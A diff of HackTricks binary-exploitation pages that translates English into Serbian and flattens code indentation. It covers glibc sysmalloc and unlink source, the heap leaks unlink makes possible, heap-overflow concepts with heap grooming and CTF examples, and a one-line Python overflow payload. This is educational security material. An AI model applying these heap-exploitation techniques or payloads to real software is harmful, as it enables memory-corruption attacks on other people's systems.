-                  /* Guarantee alignment of first new chunk made from this space */
+/* Guarantee alignment of first new chunk made from this space */
 
-                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
-                  if (front_misalign > 0)
-                    {
-                      /*
-                         Skip over some bytes to arrive at an aligned position.
-                         We don't need to specially mark these wasted front bytes.
-                         They will never be accessed anyway because
-                         prev_inuse of av->top (and any chunk created from its start)
-                         is always true after initialization.
-                       */
+front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+if (front_misalign > 0)
+{
+/*
+Skip over some bytes to arrive at an aligned position.
+We don't need to specially mark these wasted front bytes.
+They will never be accessed anyway because
+prev_inuse of av->top (and any chunk created from its start)
+is always true after initialization.
+*/
 
-                      correction = MALLOC_ALIGNMENT - front_misalign;
-                      aligned_brk += correction;
-                    }
+correction = MALLOC_ALIGNMENT - front_misalign;
+aligned_brk += correction;
+}
 
-                  /*
-                     If this isn't adjacent to existing space, then we will not
-                     be able to merge with old_top space, so must add to 2nd request.
-                   */
+/*
+If this isn't adjacent to existing space, then we will not
+be able to merge with old_top space, so must add to 2nd request.
+*/
 
-                  correction += old_size;
+correction += old_size;
 
-                  /* Extend the end address to hit a page boundary */
-                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
-                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+/* Extend the end address to hit a page boundary */
+end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
 
-                  assert (correction >= 0);
-                  snd_brk = (char *) (MORECORE (correction));
+assert (correction >= 0);
+snd_brk = (char *) (MORECORE (correction));
 
-                  /*
-                     If can't allocate correction, try to at least find out current
-                     brk.  It might be enough to proceed without failing.
+/*
+If can't allocate correction, try to at least find out current
+brk.  It might be enough to proceed without failing.
 
-                     Note that if second sbrk did NOT fail, we assume that space
-                     is contiguous with first sbrk. This is a safe assumption unless
-                     program is multithreaded but doesn't use locks and a foreign sbrk
-                     occurred between our first and second calls.
-                   */
+Note that if second sbrk did NOT fail, we assume that space
+is contiguous with first sbrk. This is a safe assumption unless
+program is multithreaded but doesn't use locks and a foreign sbrk
+occurred between our first and second calls.
+*/
 
-                  if (snd_brk == (char *) (MORECORE_FAILURE))
-                    {
-                      correction = 0;
-                      snd_brk = (char *) (MORECORE (0));
-                    }
-		  else
-		    madvise_thp (snd_brk, correction);
-                }
+if (snd_brk == (char *) (MORECORE_FAILURE))
+{
+correction = 0;
+snd_brk = (char *) (MORECORE (0));
+}
+else
+madvise_thp (snd_brk, correction);
+}
 
-              /* handle non-contiguous cases */
-              else
-                {
-                  if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
-                    /* MORECORE/mmap must correctly align */
-                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
-                  else
-                    {
-                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
-                      if (front_misalign > 0)
-                        {
-                          /*
-                             Skip over some bytes to arrive at an aligned position.
-                             We don't need to specially mark these wasted front bytes.
-                             They will never be accessed anyway because
-                             prev_inuse of av->top (and any chunk created from its start)
-                             is always true after initialization.
-                           */
+/* handle non-contiguous cases */
+else
+{
+if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
+/* MORECORE/mmap must correctly align */
+assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+else
+{
+front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+if (front_misalign > 0)
+{
+/*
+Skip over some bytes to arrive at an aligned position.
+We don't need to specially mark these wasted front bytes.
+They will never be accessed anyway because
+prev_inuse of av->top (and any chunk created from its start)
+is always true after initialization.
+*/
 
-                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
-                        }
-                    }
+aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+}
+}
 
-                  /* Find out current end of memory */
-                  if (snd_brk == (char *) (MORECORE_FAILURE))
-                    {
-                      snd_brk = (char *) (MORECORE (0));
-                    }
-                }
+/* Find out current end of memory */
+if (snd_brk == (char *) (MORECORE_FAILURE))
+{
+snd_brk = (char *) (MORECORE (0));
+}
+}
 
-              /* Adjust top based on results of second sbrk */
-              if (snd_brk != (char *) (MORECORE_FAILURE))
-                {
-                  av->top = (mchunkptr) aligned_brk;
-                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
-                  av->system_mem += correction;
+/* Adjust top based on results of second sbrk */
+if (snd_brk != (char *) (MORECORE_FAILURE))
+{
+av->top = (mchunkptr) aligned_brk;
+set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+av->system_mem += correction;
 
-                  /*
-                     If not the first time through, we either have a
-                     gap due to foreign sbrk or a non-contiguous region.  Insert a
-                     double fencepost at old_top to prevent consolidation with space
-                     we don't own. These fenceposts are artificial chunks that are
-                     marked as inuse and are in any case too small to use.  We need
-                     two to make sizes and alignments work out.
-                   */
+/*
+If not the first time through, we either have a
+gap due to foreign sbrk or a non-contiguous region.  Insert a
+double fencepost at old_top to prevent consolidation with space
+we don't own. These fenceposts are artificial chunks that are
+marked as inuse and are in any case too small to use.  We need
+two to make sizes and alignments work out.
+*/
 
-                  if (old_size != 0)
-                    {
-                      /*
-                         Shrink old_top to insert fenceposts, keeping size a
-                         multiple of MALLOC_ALIGNMENT. We know there is at least
-                         enough space in old_top to do this.
-                       */
-                      old_size = (old_size - 2 * CHUNK_HDR_SZ) & ~MALLOC_ALIGN_MASK;
-                      set_head (old_top, old_size | PREV_INUSE);
+if (old_size != 0)
+{
+/*
+Shrink old_top to insert fenceposts, keeping size a
+multiple of MALLOC_ALIGNMENT. We know there is at least
+enough space in old_top to do this.
+*/
+old_size = (old_size - 2 * CHUNK_HDR_SZ) & ~MALLOC_ALIGN_MASK;
+set_head (old_top, old_size | PREV_INUSE);
 
-                      /*
-                         Note that the following assignments completely overwrite
-                         old_top when old_size was previously MINSIZE.  This is
-                         intentional. We need the fencepost, even if old_top otherwise gets
-                         lost.
-                       */
-		      set_head (chunk_at_offset (old_top, old_size),
-				CHUNK_HDR_SZ | PREV_INUSE);
-		      set_head (chunk_at_offset (old_top,
-						 old_size + CHUNK_HDR_SZ),
-				CHUNK_HDR_SZ | PREV_INUSE);
+/*
+Note that the following assignments completely overwrite
+old_top when old_size was previously MINSIZE.  This is
+intentional. We need the fencepost, even if old_top otherwise gets
+lost.
+*/
+set_head (chunk_at_offset (old_top, old_size),
+CHUNK_HDR_SZ | PREV_INUSE);
+set_head (chunk_at_offset (old_top,
+old_size + CHUNK_HDR_SZ),
+CHUNK_HDR_SZ | PREV_INUSE);
 
-                      /* If possible, release the rest. */
-                      if (old_size >= MINSIZE)
-                        {
-                          _int_free (av, old_top, 1);
-                        }
-                    }
-                }
-            }
-        }
-    } /* if (av !=  &main_arena) */
+/* If possible, release the rest. */
+if (old_size >= MINSIZE)
+{
+_int_free (av, old_top, 1);
+}
+}
+}
+}
+}
+} /* if (av !=  &main_arena) */
 ```
-
 

 
 ### sysmalloc finale
 
-Finish the allocation updating the arena information
-
+Završite alokaciju ažuriranjem informacija o areni.
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2921C3-L2943C12
 
 if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
-    av->max_system_mem = av->system_mem;
-  check_malloc_state (av);
+av->max_system_mem = av->system_mem;
+check_malloc_state (av);
 
-  /* finally, do the allocation */
-  p = av->top;
-  size = chunksize (p);
+/* finally, do the allocation */
+p = av->top;
+size = chunksize (p);
 
-  /* check that one of the above allocation paths succeeded */
-  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
-    {
-      remainder_size = size - nb;
-      remainder = chunk_at_offset (p, nb);
-      av->top = remainder;
-      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
-      set_head (remainder, remainder_size | PREV_INUSE);
-      check_malloced_chunk (av, p, nb);
-      return chunk2mem (p);
-    }
+/* check that one of the above allocation paths succeeded */
+if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+{
+remainder_size = size - nb;
+remainder = chunk_at_offset (p, nb);
+av->top = remainder;
+set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+set_head (remainder, remainder_size | PREV_INUSE);
+check_malloced_chunk (av, p, nb);
+return chunk2mem (p);
+}
 
-  /* catch all failure paths */
-  __set_errno (ENOMEM);
-  return 0;
+/* catch all failure paths */
+__set_errno (ENOMEM);
+return 0;
 ```
-
 ## sysmalloc_mmap
 
 

 
-sysmalloc_mmap code
-
+sysmalloc_mmap код
 ```c
 // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2392C1-L2481C2
 
 static void *
 sysmalloc_mmap (INTERNAL_SIZE_T nb, size_t pagesize, int extra_flags, mstate av)
 {
-  long int size;
+long int size;
 
-  /*
-    Round up size to nearest page.  For mmapped chunks, the overhead is one
-    SIZE_SZ unit larger than for normal chunks, because there is no
-    following chunk whose prev_size field could be used.
+/*
+Round up size to nearest page.  For mmapped chunks, the overhead is one
+SIZE_SZ unit larger than for normal chunks, because there is no
+following chunk whose prev_size field could be used.
 
-    See the front_misalign handling below, for glibc there is no need for
-    further alignments unless we have have high alignment.
-   */
-  if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
-    size = ALIGN_UP (nb + SIZE_SZ, pagesize);
-  else
-    size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+See the front_misalign handling below, for glibc there is no need for
+further alignments unless we have have high alignment.
+*/
+if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
+size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+else
+size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
 
-  /* Don't try if size wraps around 0.  */
-  if ((unsigned long) (size) <= (unsigned long) (nb))
-    return MAP_FAILED;
+/* Don't try if size wraps around 0.  */
+if ((unsigned long) (size) <= (unsigned long) (nb))
+return MAP_FAILED;
 
-  char *mm = (char *) MMAP (0, size,
-			    mtag_mmap_flags | PROT_READ | PROT_WRITE,
-			    extra_flags);
-  if (mm == MAP_FAILED)
-    return mm;
+char *mm = (char *) MMAP (0, size,
+mtag_mmap_flags | PROT_READ | PROT_WRITE,
+extra_flags);
+if (mm == MAP_FAILED)
+return mm;
 
 #ifdef MAP_HUGETLB
-  if (!(extra_flags & MAP_HUGETLB))
-    madvise_thp (mm, size);
+if (!(extra_flags & MAP_HUGETLB))
+madvise_thp (mm, size);
 #endif
 
-  __set_vma_name (mm, size, " glibc: malloc");
+__set_vma_name (mm, size, " glibc: malloc");
 
-  /*
-    The offset to the start of the mmapped region is stored in the prev_size
-    field of the chunk.  This allows us to adjust returned start address to
-    meet alignment requirements here and in memalign(), and still be able to
-    compute proper address argument for later munmap in free() and realloc().
-   */
+/*
+The offset to the start of the mmapped region is stored in the prev_size
+field of the chunk.  This allows us to adjust returned start address to
+meet alignment requirements here and in memalign(), and still be able to
+compute proper address argument for later munmap in free() and realloc().
+*/
 
-  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
 
-  if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
-    {
-      /* For glibc, chunk2mem increases the address by CHUNK_HDR_SZ and
-	 MALLOC_ALIGN_MASK is CHUNK_HDR_SZ-1.  Each mmap'ed area is page
-	 aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
-      assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
-      front_misalign = 0;
-    }
-  else
-    front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
+{
+/* For glibc, chunk2mem increases the address by CHUNK_HDR_SZ and
+MALLOC_ALIGN_MASK is CHUNK_HDR_SZ-1.  Each mmap'ed area is page
+aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+front_misalign = 0;
+}
+else
+front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
 
-  mchunkptr p;                    /* the allocated/returned chunk */
+mchunkptr p;                    /* the allocated/returned chunk */
 
-  if (front_misalign > 0)
-    {
-      ptrdiff_t correction = MALLOC_ALIGNMENT - front_misalign;
-      p = (mchunkptr) (mm + correction);
-      set_prev_size (p, correction);
-      set_head (p, (size - correction) | IS_MMAPPED);
-    }
-  else
-    {
-      p = (mchunkptr) mm;
-      set_prev_size (p, 0);
-      set_head (p, size | IS_MMAPPED);
-    }
+if (front_misalign > 0)
+{
+ptrdiff_t correction = MALLOC_ALIGNMENT - front_misalign;
+p = (mchunkptr) (mm + correction);
+set_prev_size (p, correction);
+set_head (p, (size - correction) | IS_MMAPPED);
+}
+else
+{
+p = (mchunkptr) mm;
+set_prev_size (p, 0);
+set_head (p, size | IS_MMAPPED);
+}
 
-  /* update statistics */
-  int new = atomic_fetch_add_relaxed (&mp_.n_mmaps, 1) + 1;
-  atomic_max (&mp_.max_n_mmaps, new);
+/* update statistics */
+int new = atomic_fetch_add_relaxed (&mp_.n_mmaps, 1) + 1;
+atomic_max (&mp_.max_n_mmaps, new);
 
-  unsigned long sum;
-  sum = atomic_fetch_add_relaxed (&mp_.mmapped_mem, size) + size;
-  atomic_max (&mp_.max_mmapped_mem, sum);
+unsigned long sum;
+sum = atomic_fetch_add_relaxed (&mp_.mmapped_mem, size) + size;
+atomic_max (&mp_.max_mmapped_mem, sum);
 
-  check_chunk (av, p);
+check_chunk (av, p);
 
-  return chunk2mem (p);
+return chunk2mem (p);
 }
 ```
-
 

 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md
index 7d26f6546..a6496c436 100644
--- a/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/unlink.md
@@ -2,8 +2,7 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Code
-
+### Код
 ```c
 // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c
 
@@ -11,73 +10,72 @@
 static void
 unlink_chunk (mstate av, mchunkptr p)
 {
-  if (chunksize (p) != prev_size (next_chunk (p)))
-    malloc_printerr ("corrupted size vs. prev_size");
+if (chunksize (p) != prev_size (next_chunk (p)))
+malloc_printerr ("corrupted size vs. prev_size");
 
-  mchunkptr fd = p->fd;
-  mchunkptr bk = p->bk;
+mchunkptr fd = p->fd;
+mchunkptr bk = p->bk;
 
-  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
-    malloc_printerr ("corrupted double-linked list");
+if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+malloc_printerr ("corrupted double-linked list");
 
-  fd->bk = bk;
-  bk->fd = fd;
-  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
-    {
-      if (p->fd_nextsize->bk_nextsize != p
-	  || p->bk_nextsize->fd_nextsize != p)
-	malloc_printerr ("corrupted double-linked list (not small)");
+fd->bk = bk;
+bk->fd = fd;
+if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+{
+if (p->fd_nextsize->bk_nextsize != p
+|| p->bk_nextsize->fd_nextsize != p)
+malloc_printerr ("corrupted double-linked list (not small)");
 
-      // Added: If the FD is not in the nextsize list
-      if (fd->fd_nextsize == NULL)
-	{
+// Added: If the FD is not in the nextsize list
+if (fd->fd_nextsize == NULL)
+{
 
-	  if (p->fd_nextsize == p)
-	    fd->fd_nextsize = fd->bk_nextsize = fd;
-	  else
-	    // Link the nexsize list in when removing the new chunk
-	    {
-	      fd->fd_nextsize = p->fd_nextsize;
-	      fd->bk_nextsize = p->bk_nextsize;
-	      p->fd_nextsize->bk_nextsize = fd;
-	      p->bk_nextsize->fd_nextsize = fd;
-	    }
-	}
-      else
-	{
-	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
-	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
-	}
-    }
+if (p->fd_nextsize == p)
+fd->fd_nextsize = fd->bk_nextsize = fd;
+else
+// Link the nexsize list in when removing the new chunk
+{
+fd->fd_nextsize = p->fd_nextsize;
+fd->bk_nextsize = p->bk_nextsize;
+p->fd_nextsize->bk_nextsize = fd;
+p->bk_nextsize->fd_nextsize = fd;
+}
+}
+else
+{
+p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+}
+}
 }
 ```
+### Grafičko Objašnjenje
 
-### Graphical Explanation
-
-Check this great graphical explanation of the unlink process:
+Pogledajte ovo odlično grafičko objašnjenje procesa unlink:
 
 
https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/figure/unlink_smallbin_intro.png

 
-### Security Checks
+### Provere Bezbednosti
 
-- Check if the indicated size of the chunk is the same as the prev_size indicated in the next chunk
-- Check also that `P->fd->bk == P` and `P->bk->fw == P`
-- If the chunk is not small, check that `P->fd_nextsize->bk_nextsize == P` and `P->bk_nextsize->fd_nextsize == P`
+- Proverite da li je naznačena veličina chunk-a ista kao prev_size naznačen u sledećem chunk-u
+- Takođe proverite da `P->fd->bk == P` i `P->bk->fw == P`
+- Ako chunk nije mali, proverite da `P->fd_nextsize->bk_nextsize == P` i `P->bk_nextsize->fd_nextsize == P`
 
-### Leaks
+### Curjenja
 
-An unlinked chunk is not cleaning the allocated addreses, so having access to rad it, it's possible to leak some interesting addresses:
+Unlinked chunk ne čisti alocirane adrese, tako da, imajući pristup rad, moguće je curiti neke zanimljive adrese:
 
-Libc Leaks:
+Libc curenja:
 
-- If P is located in the head of the doubly linked list, `bk` will be pointing to `malloc_state` in libc
-- If P is located at the end of the doubly linked list, `fd` will be pointing to `malloc_state` in libc
-- When the doubly linked list contains only one free chunk, P is in the doubly linked list, and both `fd` and `bk` can leak the address inside `malloc_state`.
+- Ako je P smešten u glavi dvostruko povezanog spiska, `bk` će pokazivati na `malloc_state` u libc
+- Ako je P smešten na kraju dvostruko povezanog spiska, `fd` će pokazivati na `malloc_state` u libc
+- Kada dvostruko povezani spisak sadrži samo jedan slobodan chunk, P je u dvostruko povezanom spisku, i `fd` i `bk` mogu curiti adresu unutar `malloc_state`.
 
-Heap leaks:
+Curjenja iz heap-a:
 
-- If P is located in the head of the doubly linked list, `fd` will be pointing to an available chunk in the heap
-- If P is located at the end of the doubly linked list, `bk` will be pointing to an available chunk in the heap
-- If P is in the doubly linked list, both `fd` and `bk` will be pointing to an available chunk in the heap
+- Ako je P smešten u glavi dvostruko povezanog spiska, `fd` će pokazivati na dostupni chunk u heap-u
+- Ako je P smešten na kraju dvostruko povezanog spiska, `bk` će pokazivati na dostupni chunk u heap-u
+- Ako je P u dvostruko povezanom spisku, i `fd` i `bk` će pokazivati na dostupni chunk u heap-u
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/heap-overflow.md b/src/binary-exploitation/libc-heap/heap-overflow.md
index 24ea86a70..b18b1adfd 100644
--- a/src/binary-exploitation/libc-heap/heap-overflow.md
+++ b/src/binary-exploitation/libc-heap/heap-overflow.md
@@ -2,49 +2,47 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.**
+Heap overflow je kao [**stack overflow**](../stack-overflow/) ali u heap-u. U suštini, to znači da je neki prostor rezervisan u heap-u za skladištenje podataka i **skladišteni podaci su bili veći od rezervisanog prostora.**
 
-In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this.
+U stack overflow-ima znamo da će neki registri kao što su pokazivač instrukcija ili stack frame biti vraćeni iz stack-a i to bi moglo biti moguće zloupotrebiti. U slučaju heap overflow-a, **nema osetljivih informacija koje se po defaultu čuvaju** u heap chunk-u koji može biti overflow-ovan. Međutim, to mogu biti osetljive informacije ili pokazivači, tako da **kritičnost** ove ranjivosti **zavisi** od **koji podaci mogu biti prepisani** i kako bi napadač mogao to zloupotrebiti.
 
 > [!TIP]
-> In order to find overflow offsets you can use the same patterns as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets).
+> Da biste pronašli offset-e overflow-a, možete koristiti iste obrasce kao u [**stack overflow-ima**](../stack-overflow/#finding-stack-overflows-offsets).
 
-### Stack Overflows vs Heap Overflows
+### Stack Overflow-i vs Heap Overflow-i
 
-In stack overflows the arranging and data that is going to be present in the stack at the moment the vulnerability can be triggered is fairly reliable. This is because the stack is linear, always increasing in colliding memory, in **specific places of the program run the stack memory usually stores similar kind of data** and it has some specific structure with some pointers at the end of the stack part used by each function.
+U stack overflow-ima, raspored i podaci koji će biti prisutni u stack-u u trenutku kada se ranjivost može aktivirati su prilično pouzdani. To je zato što je stack linearan, uvek se povećava u kolidirajućoj memoriji, u **specifičnim mestima izvršavanja programa stack memorija obično čuva slične vrste podataka** i ima neku specifičnu strukturu sa nekim pokazivačima na kraju dela stack-a koji koristi svaka funkcija.
 
-However, in the case of a heap overflow, the used memory isn’t linear but **allocated chunks are usually in separated positions of memory** (not one next to the other) because of **bins and zones** separating allocations by size and because **previous freed memory is used** before allocating new chunks. It’s **complicated to know the object that is going to be colliding with the one vulnerable** to a heap overflow. So, when a heap overflow is found, it’s needed to find a **reliable way to make the desired object to be next in memory** from the one that can be overflowed.
+Međutim, u slučaju heap overflow-a, korišćena memorija nije linearna, već su **alokacije obično u odvojenim pozicijama memorije** (ne jedna pored druge) zbog **bins i zona** koje razdvajaju alokacije po veličini i zato što se **prethodno oslobođena memorija koristi** pre nego što se alociraju novi chunk-ovi. **Teško je znati koji objekat će se sudariti sa onim koji je ranjiv** na heap overflow. Dakle, kada se pronađe heap overflow, potrebno je pronaći **pouzdan način da se željeni objekat postavi pored u memoriji** onog koji može biti overflow-ovan.
 
-One of the techniques used for this is **Heap Grooming** which is used for example [**in this post**](https://azeria-labs.com/grooming-the-ios-kernel-heap/). In the post it’s explained how when in iOS kernel when a zone run out of memory to store chunks of memory, it expands it by a kernel page, and this page is splitted into chunks of the expected sizes which would be used in order (until iOS version 9.2, then these chunks are used in a randomised way to difficult the exploitation of these attacks).
+Jedna od tehnika koja se koristi za ovo je **Heap Grooming** koja se koristi, na primer, [**u ovom postu**](https://azeria-labs.com/grooming-the-ios-kernel-heap/). U postu se objašnjava kako kada u iOS kernel-u zona ponestane memorije za skladištenje chunk-ova, ona se širi za kernel stranicu, a ova stranica se deli na chunk-ove očekivanih veličina koji će se koristiti redom (do iOS verzije 9.2, zatim se ovi chunk-ovi koriste na nasumičan način kako bi se otežala eksploatacija ovih napada).
 
-Therefore, in the previous post where a heap overflow is happening, in order to force the overflowed object to be colliding with a victim order, several **`kallocs` are forced by several threads to try to ensure that all the free chunks are filled and that a new page is created**.
+Stoga, u prethodnom postu gde se dešava heap overflow, kako bi se primorao overflow-ovani objekat da se sudari sa objektom žrtvom, nekoliko **`kallocs` se primorava od strane nekoliko niti kako bi se pokušalo osigurati da su svi slobodni chunk-ovi popunjeni i da je stvorena nova stranica**.
 
-In order to force this filling with objects of a specific size, the **out-of-line allocation associated with an iOS mach port** is an ideal candidate. By crafting the size of the message, it’s possible to exactly specify the size of `kalloc` allocation and when the corresponding mach port is destroyed, the corresponding allocation will be immediately released back to `kfree`.
+Da bi se primoralo ovo popunjavanje objektima specifične veličine, **out-of-line alokacija povezana sa iOS mach port-om** je idealan kandidat. Prilagođavanjem veličine poruke, moguće je tačno odrediti veličinu `kalloc` alokacije i kada se odgovarajući mach port uništi, odgovarajuća alokacija će odmah biti vraćena nazad `kfree`.
 
-Then, some of these placeholders can be **freed**. The **`kalloc.4096` free list releases elements in a last-in-first-out order**, which basically means that if some place holders are freed and the exploit try lo allocate several victim objects while trying to allocate the object vulnerable to overflow, it’s probable that this object will be followed by a victim object.
+Zatim, neki od ovih mesta mogu biti **oslobođeni**. **`kalloc.4096` slobodna lista oslobađa elemente u redosledu poslednji ulaz, prvi izlaz**, što u suštini znači da ako su neka mesta oslobođena i eksploatacija pokušava da alocira nekoliko objekata žrtava dok pokušava da alocira objekat ranjiv na overflow, verovatno je da će ovaj objekat biti praćen objektom žrtvom.
 
-### Example libc
+### Primer libc
 
-[**In this page**](https://guyinatuxedo.github.io/27-edit_free_chunk/heap_consolidation_explanation/index.html) it's possible to find a basic Heap overflow emulation that shows how overwriting the prev in use bit of the next chunk and the position of the prev size it's possible to **consolidate a used chunk** (by making it thing it's unused) and **then allocate it again** being able to overwrite data that is being used in a different pointer also.
+[**Na ovoj stranici**](https://guyinatuxedo.github.io/27-edit_free_chunk/heap_consolidation_explanation/index.html) moguće je pronaći osnovnu emulaciju Heap overflow-a koja pokazuje kako prepisivanje prev in use bita sledećeg chunk-a i pozicije prev veličine omogućava **konzolidaciju korišćenog chunk-a** (praveći da misli da je neiskorišćen) i **zatim ponovo alocirati** omogućavajući prepisivanje podataka koji se koriste u drugom pokazivaču.
 
-Another example from [**protostar heap 0**](https://guyinatuxedo.github.io/24-heap_overflow/protostar_heap0/index.html) shows a very basic example of a CTF where a **heap overflow** can be abused to call the winner function to **get the flag**.
+Još jedan primer iz [**protostar heap 0**](https://guyinatuxedo.github.io/24-heap_overflow/protostar_heap0/index.html) pokazuje vrlo osnovan primer CTF-a gde se **heap overflow** može zloupotrebiti da pozove funkciju pobednika da **dobije zastavicu**.
 
-In the [**protostar heap 1**](https://guyinatuxedo.github.io/24-heap_overflow/protostar_heap1/index.html) example it's possible to see how abusing a buffer overflow it's possible to **overwrite in a near chunk an address** where **arbitrary data from the user** is going to be written to.
+U [**protostar heap 1**](https://guyinatuxedo.github.io/24-heap_overflow/protostar_heap1/index.html) primeru moguće je videti kako zloupotreba buffer overflow-a omogućava **prepisivanje u bliskom chunk-u adrese** gde će **arbitrarni podaci od korisnika** biti napisani.
 
-### Example ARM64
-
-In the page [https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/](https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/) you can find a heap overflow example where a command that is going to be executed is stored in the following chunk from the overflowed chunk. So, it's possible to modify the executed command by overwriting it with an easy exploit such as:
+### Primer ARM64
 
+Na stranici [https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/](https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instruction-set-simple-heap-overflow/) možete pronaći primer heap overflow-a gde je komanda koja će biti izvršena smeštena u sledećem chunk-u od overflow-ovanog chunk-a. Tako, moguće je modifikovati izvršenu komandu prepisivanjem sa lakim eksploatom kao:
 ```bash
 python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
 ```
-
-### Other examples
+### Drugi primeri
 
 - [**Auth-or-out. Hack The Box**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/auth-or-out/)
-  - We use an Integer Overflow vulnerability to get a Heap Overflow.
-  - We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution.
+- Koristimo ranjivost Integer Overflow da bismo dobili Heap Overflow.
+- Korumpiramo pokazivače na funkciju unutar `struct`-a prekomernog dela da postavimo funkciju kao što je `system` i dobijemo izvršenje koda.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/house-of-einherjar.md b/src/binary-exploitation/libc-heap/house-of-einherjar.md
index 28c6fd437..617f856ed 100644
--- a/src/binary-exploitation/libc-heap/house-of-einherjar.md
+++ b/src/binary-exploitation/libc-heap/house-of-einherjar.md
@@ -2,48 +2,48 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-### Code
+### Kod
 
-- Check the example from [https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c)
-- Or the one from [https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation](https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation) (you might need to fill the tcache)
+- Proverite primer sa [https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c)
+- Ili onaj sa [https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation](https://guyinatuxedo.github.io/42-house_of_einherjar/house_einherjar_exp/index.html#house-of-einherjar-explanation) (možda ćete morati da popunite tcache)
 
-### Goal
+### Cilj
 
-- The goal is to allocate memory in almost any specific address.
+- Cilj je alocirati memoriju na gotovo bilo kojoj specifičnoj adresi.
 
-### Requirements
+### Zahtevi
 
-- Create a fake chunk when we want to allocate a chunk:
-  - Set pointers to point to itself to bypass sanity checks
